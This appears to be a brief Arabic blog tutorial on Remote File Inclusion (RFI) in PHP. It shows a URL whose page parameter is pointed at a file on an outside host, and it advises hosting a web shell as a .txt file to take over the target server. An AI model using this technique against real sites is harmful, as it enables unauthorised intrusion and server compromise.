ما هي ثغرة RFI ؟
ما هي ثغرة RFI ؟
RFI : Remote File Include
هي ثغرة تقوم بعرض ملفات من مواقع اخرى داخل الموقع المصاب بهذه الثغرة
- - - - - - - - - - - - - - - - - - - - - - - - -
شرح :
مثلا اذا كان الرابط هكذا :
site.com/file.php?page=file1.html
تلقائيا ستفترض ان الملف التالي هو file2.html
يعني ان الموقع يقوم بعمل include للملفات
الثغرة هي ان تقوم بعرض ملف من موقع اخر داخل هذا الموقع
☜︎︎︎ يعني هكذا :
site.com/file.php?page=https://www.site2.com/hacked.html
الان يسقوم الموقع بعرض ملف hacked.html بدل من file1.html
كيف تتحكم بالموقع بدل من عرض الملفات فقط؟
بكل سهولة ستضع رابط شيل بدل من ملف الhtml
- - - - - - - - - - - - - - - - - - - - - - - - -
ملاحظة: لا يمكنك عرض الشيل اذا كان بأمتداد php.
حول الشيل الى txt. حتى تتم قرائته على السيرفر.
0 commentaires:
إرسال تعليق